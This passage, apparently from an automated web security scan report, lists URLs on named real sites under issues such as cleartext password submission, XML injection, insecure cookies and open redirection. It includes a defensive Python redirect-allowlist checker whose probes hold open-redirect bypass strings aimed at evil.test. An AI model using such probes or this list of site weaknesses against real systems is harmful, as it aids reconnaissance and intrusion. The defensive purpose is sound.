7.74. http://api.trulia.com/crossdomain.xml

7.75. http://au.myspace.com/crossdomain.xml

7.76. http://b.myspace.com/crossdomain.xml

7.77. http://b1.adbrite.com/crossdomain.xml

7.78. http://check4.connect.facebook.com/crossdomain.xml

7.79. http://check4.facebook.com/crossdomain.xml

7.80. http://check6.connect.facebook.com/crossdomain.xml

7.81. http://check6.facebook.com/crossdomain.xml

7.82. http://clk.pointroll.com/crossdomain.xml

7.83. http://delb.opt.fimserve.com/crossdomain.xml

7.84. http://demr.opt.fimserve.com/crossdomain.xml

7.85. http://desb.opt.fimserve.com/crossdomain.xml

7.86. http://googleads.g.doubleclick.net/crossdomain.xml

7.87. http://images.trulia.com/crossdomain.xml

7.88. http://mm.chitika.net/crossdomain.xml

7.89. http://news.9REDACTED.com.au/crossdomain.xml

7.90. http://news.REDACTED/crossdomain.xml

7.91. http://optimized-by.rubiconproject.com/crossdomain.xml

7.92. http://s.youtube.com/crossdomain.xml

7.93. http://static.ak.connect.facebook.com/crossdomain.xml

7.94. http://static.ak.fbcdn.net/crossdomain.xml

7.95. http://thumbs.trulia.com/crossdomain.xml

7.96. http://tracking.quisma.com/crossdomain.xml

7.97. http://twittercounter.com/crossdomain.xml

7.98. http://www.awltovhc.com/crossdomain.xml

7.99. http://www.brisbanetimes.com.au/crossdomain.xml

7.100. http://www.connect.facebook.com/crossdomain.xml

7.101. http://www.facebook.com/crossdomain.xml

7.102. http://www.ftjcfx.com/crossdomain.xml

7.103. http://www.glam.de/crossdomain.xml

7.104. http://www.guardian.co.uk/crossdomain.xml

7.105. http://www.myspace.com/crossdomain.xml

7.106. http://www.realestate.com.au/crossdomain.xml

7.107. http://www.shopstyle.com/crossdomain.xml

7.108. http://www.stumbleupon.com/crossdomain.xml

7.109. http://www.theage.com.au/crossdomain.xml

7.110. http://www.tqlkg.com/crossdomain.xml

7.111. http://www.trulia.com/crossdomain.xml

7.112. http://www.watoday.com.au/crossdomain.xml

7.113. http://www.youtube.com/crossdomain.xml

7.114. http://api.twitter.com/crossdomain.xml

7.115. http://cms.myspacecdn.com/crossdomain.xml

7.116. http://stats.wordpress.com/crossdomain.xml

7.117. http://twitter.com/crossdomain.xml

7.118. http://v7.lscache6.c.youtube.com/crossdomain.xml

8. Silverlight cross-domain policy

8.1. http://ad-apac.doubleclick.net/clientaccesspolicy.xml

8.2. http://ad.au.doubleclick.net/clientaccesspolicy.xml

8.3. http://ads.pointroll.com/clientaccesspolicy.xml

8.4. http://api.bing.net/clientaccesspolicy.xml

8.5. http://cdn.eyewonder.com/clientaccesspolicy.xml

8.6. http://ecn.api.tiles.virtualearth.net/clientaccesspolicy.xml

8.7. http://h0.ortho.tiles.virtualearth.net/clientaccesspolicy.xml

8.8. http://h1.ortho.tiles.virtualearth.net/clientaccesspolicy.xml

8.9. http://h2.ortho.tiles.virtualearth.net/clientaccesspolicy.xml

8.10. http://h3.ortho.tiles.virtualearth.net/clientaccesspolicy.xml

8.11. http://img2.catalog.video.REDACTED.com/clientaccesspolicy.xml

8.12. http://pixel.33across.com/clientaccesspolicy.xml

8.13. http://rad.REDACTED.com/clientaccesspolicy.xml

8.14. http://secure-au.imrworldwide.com/clientaccesspolicy.xml

8.15. http://speed.pointroll.com/clientaccesspolicy.xml

8.16. http://stats.wordpress.com/clientaccesspolicy.xml

8.17. http://a1.bing4.com/clientaccesspolicy.xml

8.18. http://a2.bing4.com/clientaccesspolicy.xml

8.19. http://a3.bing4.com/clientaccesspolicy.xml

8.20. http://ts1.mm.bing.net/clientaccesspolicy.xml

9. Cleartext submission of password

9.1. http://cx.trizetto.com/

9.2. http://designers.glam.com/2011/04/29/wp-content/themes/glam_v1/glam-login/login_template.php

9.3. http://vpswebserver.com/

9.4. http://www.glam.com/profile

9.5. http://www.glam.com/wp-content/themes/glam_v1/glam-login/login_template.php

9.6. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

9.7. http://www.thefashionablegal.com/wp-login.php

9.8. http://www.thefashionablehousewife.com/wp-login.php

9.9. http://www.thesunchronicle.com/articles/2011/05/02/rehoboth/9166782.txt

10. XML injection

10.1. http://amch.questionmarket.com/adsc/d891575/2/891856/adscout.php [REST URL parameter 1]

10.2. http://loadus.exelator.com/load/ [REST URL parameter 1]

10.3. http://loadus.exelator.com/load/net.php [REST URL parameter 1]

10.4. http://loadus.exelator.com/load/net.php [REST URL parameter 2]

10.5. http://media.onsugar.com/v553/static/richmedia/ISM-300x250.swf [REST URL parameter 1]

10.6. http://media.onsugar.com/v553/static/richmedia/ISM-300x250.swf [REST URL parameter 2]

10.7. http://media.onsugar.com/v553/static/richmedia/ISM-300x250.swf [REST URL parameter 3]

10.8. http://media.onsugar.com/v553/static/richmedia/ISM-300x250.swf [REST URL parameter 4]

10.9. http://pixel.quantserve.com/seg/r [REST URL parameter 1]

10.10. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

10.11. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

10.12. http://s.ytimg.com/yt/swfbin/apiplayer3-vflDDA3kt.swf [REST URL parameter 2]

10.13. http://s.ytimg.com/yt/swfbin/apiplayer3-vflDDA3kt.swf [REST URL parameter 3]

10.14. http://tracking.quisma.com/v.cfs [REST URL parameter 1]

10.15. http://vincentfretin.ecreall.com/favicon.ico [REST URL parameter 1]

10.16. http://www.glam.com/topic/feed/ [REST URL parameter 1]

10.17. http://www.glam.com/xmlrpc.php [REST URL parameter 1]

10.18. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 1]

10.19. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

10.20. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 1]

10.21. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]

10.22. http://www.righthealth.com/javascripts/adore/ad2.html [REST URL parameter 1]

10.23. http://www.righthealth.com/javascripts/adore/ad2.html [REST URL parameter 2]

10.24. http://www.righthealth.com/javascripts/adore/ad2.html [REST URL parameter 3]

10.25. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-151793.js [REST URL parameter 1]

10.26. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-sem-chimborazo-151793.js [REST URL parameter 1]

10.27. http://www2b.abc.net.au/tmb/Client/Board.aspx [REST URL parameter 3]

10.28. http://www2b.abc.net.au/tmb/Client/MessageBoardList.aspx [REST URL parameter 3]

11. SSL cookie without secure flag set

11.1. https://admin.iconnection.com/login.aspx

11.2. https://auth.tek.com/mytek/faces/forgotpassword.jsp

11.3. https://auth.tek.com/mytek/faces/loginregistration.jsp

11.4. https://auth.tek.com/mytek/faces/scripts/forms.js

11.5. https://auth.tek.com/mytek/faces/scripts/jsr_class.js

11.6. https://auth.tek.com/mytek/faces/scripts/sm.js

11.7. https://auth.tek.com/mytek/faces/scripts/webservice.js

11.8. https://customer.trizetto.com/OnyxCustomerPortal/

11.9. https://customer.trizetto.com/OnyxCustomerPortal/home.asp

11.10. https://customer.trizetto.com/OnyxCustomerPortal/menu.asp

11.11. https://idesk.infocrossing.com/

11.12. https://support.logrhythm.com/ics/default.asp

11.13. https://support.logrhythm.com/ics/support/LeftSplash.asp

11.14. https://support.logrhythm.com/ics/support/default.asp

11.15. https://support.logrhythm.com/ics/support/mylogin.asp

11.16. https://tracker.i-structure.com/

11.17. https://www.idexpertscorp.com/RADAR/

11.18. https://www.idexpertscorp.com/dbhc/

11.19. https://www.medicare-solution.com/mss/home/Index.jsp

11.20. https://www1.gotomeeting.com/register/451586600

11.21. https://support.logrhythm.com/FileManagement/Download/08bdb7021bc34da1829ccb8c216d97ba

11.22. https://support.logrhythm.com/FileManagement/Download/e04c558f41be497b8f6340964105111b

11.23. https://www.hipaastore.com/index.php

12. Session token in URL

12.1. http://gw-services.vtrenz.net/WebCookies/RegisterWebPageVisit.cfm

12.2. http://l.sharethis.com/pview

12.3. http://nmp.newsgator.com/ngbuzz/buzz.ashx

12.4. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/ps/ifr

12.5. http://www.facebook.com/extern/login_status.php

12.6. http://www.google.com/realtimejs

12.7. http://www.topcareerschools.com/s/279-390/12823153/

13. SSL certificate

13.1. https://admin.iconnection.com/

13.2. https://auth.tek.com/

13.3. https://owa.iconnection.com/

13.4. https://www.hipaastore.com/

13.5. https://clientcommunity.touchnet.com/

13.6. https://customer.trizetto.com/

13.7. https://idesk.infocrossing.com/

13.8. https://support.logrhythm.com/

13.9. https://tracker.i-structure.com/

13.10. https://www.idexpertscorp.com/

13.11. https://www.medicare-solution.com/

13.12. https://www.placemyad.com.au/

13.13. https://www1.gotomeeting.com/

14. Open redirection

14.1. http://1.gravatar.com/avatar/b530ef61ccf43de890b51db56fe3b417 [d parameter]

14.2. http://clk.pointroll.com/bc/ [clickurl parameter]

14.3. http://enjmp.com/links/ [redir parameter]

14.4. http://i.w55c.net/ping_match.gif [rurl parameter]

14.5. http://rd.apmebf.com/w/get.media [host parameter]

14.6. http://www30a2.glam.com/gad/click.act [0390-_urlenc%3D1-_gclickid%3Dgaclk4dbeab6768481-_advid%3D2207134-_adid%3D5000034269-_crid%3D500024892-_aipid%3D201105020550-_ge_%3D1%5E2%5E86b651121110f17017fc49e94023871f-ord%3D6433973438106477-afid%3D0-dsid%3D629717-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D3-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D65-u%3Db006300739t1qn3g329%2Cf0f12sa%2Cg10001t-_gclick_gaclk4dbeab6768481 parameter]

14.7. http://www30a2.glam.com/gad/click.act [0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c parameter]

14.8. http://www30a2.glam.com/gad/click.act [0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab9d115b9-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E0290f85105ed3b1643656c29f374dce2-ord%3D7453895208891481-afid%3D526139-dsid%3D526139-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db00624ved011qn3hgmi%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab9d115b9 parameter]

14.9. http://www30a2.glam.com/gad/click.act [0396-_urlenc%3D1-_gclickid%3Dgaclk4dbeac7e98e3b-_advid%3D50002348-_adid%3D5000039404-_crid%3D500028679-_aipid%3D201105020558-_ge_%3D1%5E2%5Ec5a4fa25299e494dabd350a318327c8a-ord%3D1613273131661117-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D6z09gi-flg%3D64-u%3Db00222w2epr1qn3nw6r%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeac7e98e3b parameter]
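
Every open-redirection entry above hinges on a destination taken straight from a request parameter (d, clickurl, redir, rurl, host). The check below is an added example, not code from any site listed in this report: it resolves a user-supplied redirect target against a host allowlist and rejects the variants that routinely slip past a naive prefix check (protocol-relative //host, backslashes, userinfo tricks, non-http schemes, header-splitting characters). The hosts www.example.com and shop.example.com and the base URL are constructed assumptions.

```python
"""Validate a user-supplied redirect target against a host allowlist.

Added example, not code from any site in this report. The allowlist and
base URL below are constructed; substitute the hosts your application is
actually allowed to send users to."""
from urllib.parse import urlsplit, urlunsplit, urljoin

ALLOWED_HOSTS = {"www.example.com", "shop.example.com"}  # constructed
SITE_BASE = "https://www.example.com/"                    # constructed


def resolve_redirect(target, allowed_hosts=ALLOWED_HOSTS, base=SITE_BASE):
    """Return a safe absolute URL for `target`, or None (caller falls back to `base`).

    Accepts only (a) a site-relative path ('/path', not '//host') and
    (b) an absolute http(s) URL whose hostname is in the allowlist.
    Anything else is rejected rather than rewritten: every 'cleaning' rule
    is one more thing to get wrong."""
    if not isinstance(target, str) or not target:
        return None
    # CR/LF would split the Location header; backslashes are normalised to
    # '/' by browsers, so '/\evil' would become '//evil' client-side.
    if any(ord(c) < 0x20 or c == "\x7f" for c in target) or "\\" in target:
        return None
    try:
        parts = urlsplit(target)
        port = parts.port  # raises ValueError on junk like ':99999'
    except ValueError:
        return None
    if parts.scheme == "" and parts.netloc == "":
        # Relative reference. '//evil.test' has a netloc and never gets here;
        # a bare word like 'evil.test' is rejected because it is not
        # site-relative and only invites ambiguity.
        if not target.startswith("/"):
            return None
        return urljoin(base, target)
    if parts.scheme not in ("http", "https"):
        return None  # javascript:, data:, vbscript:, ...
    # .hostname drops userinfo and lower-cases, so
    # 'https://www.example.com@evil.test/' is seen as evil.test.
    host = (parts.hostname or "").rstrip(".")
    if host not in allowed_hosts:
        return None
    netloc = host + (":%d" % port if port else "")
    return urlunsplit((parts.scheme, netloc, parts.path or "/", parts.query, ""))


if __name__ == "__main__":
    # Constructed probes modelled on the parameter values a scanner sends.
    for probe in ["/account?x=1", "//evil.test/", "/\\evil.test",
                  "javascript:alert(1)", "https://www.example.com@evil.test/",
                  "https://shop.example.com:8443/cart", "evil.test"]:
        print("%-40r -> %r" % (probe, resolve_redirect(probe)))
```

The function returns None instead of raising so the calling handler can redirect to SITE_BASE unconditionally on failure; logging the rejected value is worthwhile, since a burst of //host and @-style probes against a redirect parameter is exactly what produced the rows above.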

15. Cookie scoped to parent domain

15.1. http://api.twitter.com/1/statuses/user_timeline.json

15.2. https://auth.tek.com/mytek/faces/forgotpassword.jsp

15.3. https://auth.tek.com/mytek/faces/loginregistration.jsp

15.4. https://auth.tek.com/mytek/faces/scripts/forms.js

15.5. https://auth.tek.com/mytek/faces/scripts/jsr_class.js

15.6. https://auth.tek.com/mytek/faces/scripts/sm.js

15.7. https://auth.tek.com/mytek/faces/scripts/webservice.js

15.8. http://e-sites2.tek.com/mytek/faces/resourcelogin.jsp

15.9. http://e-sites2.tek.com/mytek/faces/scripts/forms.js

15.10. http://e-sites2.tek.com/mytek/faces/scripts/jsr_class.js

15.11. http://e-sites2.tek.com/mytek/faces/scripts/sm.js

15.12. http://e-sites2.tek.com/mytek/faces/scripts/webservice.js

15.13. http://e-sites2.tek.com/mytek/faces/startresource.jsp

15.14. http://glamnewlive.disqus.com/remote_auth.js

15.15. http://t.mookie1.com/t/v1/imp

15.16. http://www.patlive.com/appointment-scheduling/

15.17. http://www.topcareerschools.com/s/279-390/12823153/

15.18. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

15.19. http://ad.afy11.net/ad

15.20. http://ad.amgdgt.com/ads/

15.21. http://ad.linksynergy.com/fs-bin/show

15.22. http://ad.linksynergy.com/fs-bin/show

15.23. http://ad.turn.com/server/ads.js

15.24. http://ad.turn.com/server/pixel.htm

15.25. http://ad.yabuka.com/statsin/adframe/693/300x250

15.26. http://ad.yabuka.com/statsin/adframe/903/300x250

15.27. http://adfarm.mediaplex.com/ad/js/6726-112732-1178-13

15.28. http://ads.adbrite.com/adserver/behavioral-data/8201

15.29. http://ads.adbrite.com/adserver/behavioral-data/8204

15.30. http://ads.adbrite.com/adserver/vdi/682865

15.31. http://ads.adbrite.com/adserver/vdi/712156

15.32. http://ads.adbrite.com/adserver/vdi/742697

15.33. http://ads.adbrite.com/adserver/vdi/753292

15.34. http://ads.adbrite.com/adserver/vdi/779045

15.35. http://ads.adbrite.com/adserver/vdi/810647

15.36. http://ads.adbrite.com/adserver/vdi/830697

15.37. http://ads.pointroll.com/PortalServe/

15.38. http://ads.revsci.net/adserver/ako

15.39. http://ads.revsci.net/adserver/ako

15.40. http://ads.revsci.net/adserver/ako

15.41. http://ads.revsci.net/adserver/ako

15.42. http://ads.revsci.net/adserver/ako

15.43. http://ads.revsci.net/adserver/ako

15.44. http://ads.revsci.net/adserver/ako

15.45. http://ads.revsci.net/adserver/ako

15.46. http://ads.revsci.net/adserver/ako

15.47. http://ads.revsci.net/adserver/ako

15.48. http://ads.revsci.net/adserver/ako

15.49. http://ads.revsci.net/adserver/ako

15.50. http://ads.revsci.net/adserver/ako

15.51. http://ads.revsci.net/adserver/ako

15.52. http://ads.revsci.net/adserver/ako

15.53. http://ads.revsci.net/adserver/ako

15.54. http://ads.revsci.net/adserver/ako

15.55. http://ads.revsci.net/adserver/ako

15.56. http://ads.revsci.net/adserver/ako

15.57. http://ads.revsci.net/adserver/ako

15.58. http://ads.revsci.net/adserver/ako

15.59. http://ads.revsci.net/adserver/ako

15.60. http://ads.specificmedia.com/serve/v=5

15.61. http://ads2.adbrite.com/v0/ad

15.62. http://ads2.adbrite.com/v0/ad

15.63. http://afe.specificclick.net/

15.64. http://altfarm.mediaplex.com/ad/js/13001-83639-12284-11

15.65. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5

15.66. http://altfarm.mediaplex.com/ad/js/17975-126683-12284-1

15.67. http://amch.questionmarket.com/adsc/d724925/17/725047/adscout.php

15.68. http://amch.questionmarket.com/adsc/d724925/18/725047/adscout.php

15.69. http://amch.questionmarket.com/adsc/d724925/4/725047/adscout.php

15.70. http://amch.questionmarket.com/adsc/d724925/9/725047/adscout.php

15.71. http://amch.questionmarket.com/adsc/d891575/2/891856/adscout.php

15.72. http://amch.questionmarket.com/adsc/d908201/2/41838359/adscout.php

15.73. http://amch.questionmarket.com/adscgen/st.php

15.74. http://ar.voicefive.com/b/wc_beacon.pli

15.75. http://ar.voicefive.com/bmx3/broker.pli

15.76. http://au.myspace.com/

15.77. http://b.scorecardresearch.com/b

15.78. http://b.scorecardresearch.com/p

15.79. http://b.scorecardresearch.com/r

15.80. http://b.voicefive.com/b

15.81. http://b3.mookie1.com/1/TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228@Bottom3

15.82. http://bh.contextweb.com/bh/rtset

15.83. http://bidder.mathtag.com/iframe/notify

15.84. http://bs.serving-sys.com/BurstingPipe/adServer.bs

15.85. http://c.atdmt.com/c.gif

15.86. http://c.REDACTED/c.gif

15.87. http://c.statcounter.com/t.php

15.88. http://c7.zedo.com/bar/v16-405/c5/jsc/gl.js

15.89. http://cm.au.REDACTED.overture.com/js_flat_1_0/

15.90. http://cm.netseer.com/redirect

15.91. http://REDACTED/js_1_0/

15.92. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzA0NzA4OQ

15.93. http://d7.zedo.com/bar/v16-405/d3/jsc/gl.js

15.94. http://delb.opt.fimserve.com/adopt/

15.95. http://demr.opt.fimserve.com/adopt/

15.96. http://desb.opt.fimserve.com/adopt/

15.97. http://glam.grapeshot.co.uk/main/redirect.cgi

15.98. http://glam.ivwbox.de/2004/01/survey.js

15.99. http://glam.ivwbox.de/blank.gif

15.100. http://glam.ivwbox.de/cgi-bin/ivw/CP/GLA_UK_123456

15.101. http://hits.guardian.co.uk/b/ss/guardiangu-music,guardiangu-network/1/H.22.1/s33948350739665

15.102. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj

15.103. http://i.w55c.net/ping_match.gif

15.104. http://ib.adnxs.com/ab

15.105. http://ib.adnxs.com/acb

15.106. http://ib.adnxs.com/getuid

15.107. http://ib.adnxs.com/if

15.108. http://ib.adnxs.com/mapuid

15.109. http://ib.adnxs.com/ptj

15.110. http://ib.adnxs.com/ptj

15.111. http://ib.adnxs.com/ptj

15.112. http://ib.adnxs.com/ptj

15.113. http://ib.adnxs.com/ptj

15.114. http://ib.adnxs.com/ptj

15.115. http://ib.adnxs.com/ptj

15.116. http://ib.adnxs.com/ptj

15.117. http://ib.adnxs.com/ptj

15.118. http://ib.adnxs.com/ptj

15.119. http://ib.adnxs.com/ptj

15.120. http://ib.adnxs.com/ptj

15.121. http://ib.adnxs.com/ptj

15.122. http://ib.adnxs.com/ptj

15.123. http://ib.adnxs.com/seg

15.124. http://ib.adnxs.com/setuid

15.125. http://ib.adnxs.com/ttj

15.126. http://id.google.com/verify/EAAAAF5lv2XjP7uWOyR1swCFb64.gif

15.127. http://id.google.com/verify/EAAAAN1EBcu_tAopVv8fuxVAz2g.gif

15.128. http://idpix.media6degrees.com/orbserv/hbpix

15.129. http://image2.pubmatic.com/AdServer/Pug

15.130. http://leadback.advertising.com/adcedge/lb

15.131. http://loadus.exelator.com/load/

15.132. http://log.c12s.com/redir/327090/0/740/1396695815192695/0/643921/53/100004/1.ver

15.133. http://lp.idexpertscorp.com/hitech-whitepapera/IDE-Unbounce-footer-A.original_4v7u278ezbx8it4w.jpg

15.134. http://lp.idexpertscorp.com/hitech-whitepapera/bg-grad-fade-edge-ul.original.png

15.135. http://lp.idexpertscorp.com/hitech-whitepapera/bullet.original.jpg

15.136. http://lp.idexpertscorp.com/hitech-whitepapera/button-down.original.jpg

15.137. http://lp.idexpertscorp.com/hitech-whitepapera/button-up.original.jpg

15.138. http://lp.idexpertscorp.com/hitech-whitepapera/form-bottom-CORRECT.original.jpg

15.139. http://lp.idexpertscorp.com/hitech-whitepapera/form-header.original.jpg

15.140. http://lp.idexpertscorp.com/hitech-whitepapera/page_defaults.css

15.141. http://lp.idexpertscorp.com/hitech-whitepapera/reset.css

15.142. http://lp.idexpertscorp.com/hitech-whitepapera/testimonial-arrow.original.gif

15.143. http://lp.idexpertscorp.com/hitech-whitepapera/top-fade.original.jpg

15.144. http://lp.idexpertscorp.com/hitech-whitepapera/version-1-header.original_4v7ufsth145maha8.jpg

15.145. http://m.adnxs.com/msftcookiehandler

15.146. http://map.media6degrees.com/orbserv/aopix

15.147. http://map.media6degrees.com/orbserv/hbpix

15.148. http://media.fastclick.net/w/get.media

15.149. http://media.trafficmp.com/a/js

15.150. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnewsau/ros/728x90/jx/ss/a/1623201161@Top1

15.151. http://nmhiltonhead.112.2o7.net/b/ss/nmhiltonhead/1/H.20.3/s3688769728876

15.152. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview/oas.html/1203925231@Top,Middle2,Right1,x31

15.153. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js

15.154. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js

15.155. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js

15.156. http://optimized-by.rubiconproject.com/a/7845/12566/22544-2.html

15.157. http://optimized-by.rubiconproject.com/a/7845/12566/22544-9.html

15.158. http://optimized-by.rubiconproject.com/a/7845/12566/26835-15.html

15.159. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

15.160. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js

15.161. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js

15.162. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js

15.163. http://optimized-by.rubiconproject.com/a/7968/13027/24102-15.js

15.164. http://optimized-by.rubiconproject.com/a/7968/13027/24103-2.js

15.165. http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html

15.166. http://phoenix.untd.com/TRCK/RGST

15.167. http://pix04.revsci.net/E05516/b3/0/3/0902121/268098805.js

15.168. http://pix04.revsci.net/G08769/b3/0/3/0902121/439307182.js

15.169. http://pix04.revsci.net/G08769/b3/0/3/0902121/448568946.js

15.170. http://pix04.revsci.net/G08769/b3/0/3/0902121/47587256.js

15.171. http://pix04.revsci.net/G08769/b3/0/3/0902121/565634184.js

15.172. http://pix04.revsci.net/G08769/b3/0/3/0902121/702929375.js

15.173. http://pix04.revsci.net/G08769/b3/0/3/0902121/717262760.js

15.174. http://pix04.revsci.net/G08769/b3/0/3/0902121/797060244.js

15.175. http://pix04.revsci.net/G08769/b3/0/3/0902121/973395291.js

15.176. http://pixel.33across.com/ps/

15.177. http://pixel.33across.com/ps/189233/

15.178. http://pixel.33across.com/ps/273884/

15.179. http://pixel.33across.com/ps/332046/

15.180. http://pixel.33across.com/ps/41208/

15.181. http://pixel.33across.com/ps/425905/

15.182. http://pixel.33across.com/ps/500284/

15.183. http://pixel.33across.com/ps/682989/

15.184. http://pixel.invitemedia.com/data_sync

15.185. http://pixel.invitemedia.com/pixel

15.186. http://pixel.quantserve.com/pixel

15.187. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif

15.188. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

15.189. http://pixel.quantserve.com/seg/r

15.190. http://pixel.rubiconproject.com/di.php

15.191. http://pixel.rubiconproject.com/tap.php

15.192. http://pixel.rubiconproject.com/tap.php

15.193. http://pixel.rubiconproject.com/tap.php

15.194. http://pixel.rubiconproject.com/tap.php

15.195. http://pixel.rubiconproject.com/tap.php

15.196. http://pixel.rubiconproject.com/tap.php

15.197. http://pixel.rubiconproject.com/tap.php

15.198. http://r.openx.net/set

15.199. http://r.turn.com/r/beacon

15.200. http://r1-ads.ace.advertising.com/site=743833/size=300250/u=2/bnum=65003685/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.thesunchronicle.com%252Farticles%252F2011%252F05%252F02%252Frehoboth%252F9166782.txt

15.201. http://r1-ads.ace.advertising.com/site=781800/size=728090/u=2/bnum=78594486/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.islandpacket.com%252F2011%252F05%252F02%252F1640363%252Fwill-killing-osama-kill-the-movement.html

15.202. http://r1-ads.ace.advertising.com/site=795866/size=728090/u=2/bnum=47065580/hr=15/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.righthealth.com%252Ftopic%252FWhat_Is_Hipaa%253Fp%253Dl%2526as%253DREDACTED%2526ac%253D529%2526kgl%253D38620759

15.203. http://r1-ads.ace.advertising.com/site=799695/size=300250/u=2/bnum=54085448/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html

15.204. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=28266332/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.dailytelegraph.com.au%252Fnews%252Fbreaking-news%252Ftony-abbott-says-migration-proposals-are-weak%252Fstory-e6freuz0-1226045133021%253Ffrom%253Dpublic_rss

15.205. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=29579703/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.theaustralian.com.au%252Fnews%252Fnation%252Fabbott-a-hero-on-troubled-christmas-island%252Fstory-e6frg6nf-1226045245809

15.206. http://r1-ads.ace.advertising.com/site=801647/size=300250/u=2/bnum=65424947/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.news.com.au%252Fbreaking-news%252Fnational%252Fchristmas-island-detainee-sews-lips-together%252Fstory-e6frfku9-1226044502823

15.207. http://rd.apmebf.com/w/get.media

15.208. http://s.xp1.ru4.com/meta

15.209. http://segment-pixel.invitemedia.com/pixel

15.210. http://segment-pixel.invitemedia.com/set_partner_uid

15.211. http://sync.mathtag.com/sync/img

15.212. http://t.invitemedia.com/track_imp

15.213. http://tacoda.at.atwola.com/rtx/r.js

15.214. http://tag.contextweb.com/TagPublish/getad.aspx

15.215. http://tags.bluekai.com/site/2312

15.216. http://tags.bluekai.com/site/2312

15.217. http://tags.bluekai.com/site/2731

15.218. http://tags.bluekai.com/site/2748

15.219. http://tags.bluekai.com/site/3358

15.220. http://tags.bluekai.com/site/3890

15.221. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

15.222. http://tap.rubiconproject.com/oz/feeds/targus/profile

15.223. http://tap.rubiconproject.com/oz/sensor

15.224. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

15.225. http://trgca.opt.fimserve.com/fp.gif

15.226. http://video.REDACTED.com/soapboxservice2.aspx

15.227. http://widget.linkwithin.com/get_custom_js

15.228. http://widget2.linkwithin.com/get_custom_js

15.229. http://www.abc.net.au/7.30/content/2011/js/swfobject.js

15.230. http://www.abc.net.au/7.30/content/2011/s3200763.htm

15.231. http://www.abc.net.au/crossdomain.xml

15.232. http://www.abc.net.au/favicon.ico

15.233. http://www.abc.net.au/includes/scripts/global.js

15.234. http://www.abc.net.au/news/assets/v5/images/common/footer-bg.png

15.235. http://www.abc.net.au/news/assets/v5/images/common/programs-footer.png

